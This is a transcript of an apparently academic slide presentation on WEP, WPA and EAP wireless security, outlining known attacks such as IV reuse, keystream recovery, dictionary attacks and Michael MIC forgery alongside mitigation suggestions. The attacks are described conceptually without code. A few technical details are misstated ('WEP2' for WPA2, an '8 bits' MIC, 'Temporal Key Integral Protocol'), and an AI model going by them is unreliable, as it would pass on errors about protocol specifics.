wep, wpa, and eap
DESCRIPTION
WEP, WPA, and EAP. Drew Kalina. Overview. Wired Equivalent Privacy (WEP) Wi-Fi Protected Access (WPA) Extensible Authentication Protocol (EAP). WEP. Encryption method: RC4 Key size: 40 bits Hash method: ICV 802.11x authentication: optional Key distribution: manual. - PowerPoint PPT PresentationTRANSCRIPT
WEP, WPA, and EAP
Drew Kalina
Overview
Wired Equivalent Privacy (WEP) Wi-Fi Protected Access (WPA) Extensible Authentication Protocol
(EAP)
WEP
Encryption method: RC4 Key size: 40 bits Hash method: ICV 802.11x authentication: optional Key distribution: manual
WEP Vulnerabilities
ICV insecure – based on CRC32 (bad) ICV can be modified to match message
contents IV key reuse attack
Small IV allows this IV sent as plaintext
WEP Vulnerabilities (cont)
Known plaintext attack Lots of unencrypted TCP/IP traffic Send pings from internet to access point String length N can be recovered for a
given IV Packets of size N can be forged using IV
WEP Vulnerabilities (cont)
Partial Known Plaintext Only a portion of message is known (e.g.
IP header) Can recover M octets of key stream
where M<N Extend then known key stream from M to
N through probing Divert packets to attacker by flipping
CRC32 bits
WEP Vulnerabilities (cont) Authentication forging
Use recovered key stream and IV because client specifies IV
Dictionary attacks Key derived from vulnerable password
Realtime decryption Dictionary of IVs and keystreams Only 2^24 possibilities Can be stored in 24GB disk space
WEP summary
Weak encryption with other problems If possible, use some other protocol Still better than plaintext
WPA
Encryption method: RC4, TKIP Key size: 128 bits (varies) Hash method: ICV, Michael 802.11x authentication: can be
required Key distribution: TKIP
WPA (cont) Michael generates MIC (Message
Integrity Code) 8 bits Placed between data and ICV
TKIP (Temporal Key Integral Protocol) Resolves keys to be used, looks at
client’s configuration Changes encryption key every frame Sets unique default key for each client
WPA Vulnerabilities
Birthday attack Get a pair D,M where D1 = MIC(M1) When Di = D1 where Di != 1, attack is
successful Probability for success: 2^32 If keys change during attack, forgery is
garbage
WPA Vulnerabilities (cont) Differential cryptanalytic attack
Michael results have special characteristics
M = Mi XOR Mj and D = Di XOR Dj called characteristic differentials
After characteristic differentials obtained, try to find MIC (learn parts of the key)
Probability of success 2^30 Optimal attack exists with O(2^29)
WPA Vulnerabilities (cont)
Temporal Key Lost RC4 Keys Can discover TK and MIC Can forge messages Not a practical attack, O(2^105) Does show susceptibility in parts of WPA
WPA Vulnerabilities (cont) DOS
Access point shuts down for 60 seconds if forged unauthorized data detected
Possible to shut access points with little network activity
PSK Used in absence of 802.1x, 1 per ESS (usually). Internal person can use this, and a captured MAC
address/nonce to imitate another client Vulnerable to external dictionary attacks, if short
WPA summary
Much better than WEP (if 802.1x) WEP2 even better using AES-CCMP There are still vulnerabilities Many WEP devices are upgradeable to
WPA (not WPA2)
Suggestions for WPA
Rekey security associations after failures
Lower/eliminate timeouts after detecting forged packets Currently would take 1000+ years to
break with 60 second timeouts
EAP
Transmission method and framework for authentication protocols
Works with many authen. protocols such as RADIUS, Kerberos.
Uses a variety of transport methods
EAP Transport methods
EAP-TLS EAP-TTLS PEAP (Protected EAP) LEAP (Light EAP)
Vulnerabilities in LEAP
Dictionary attack Early versions of MS-CHAP weak
That’s all!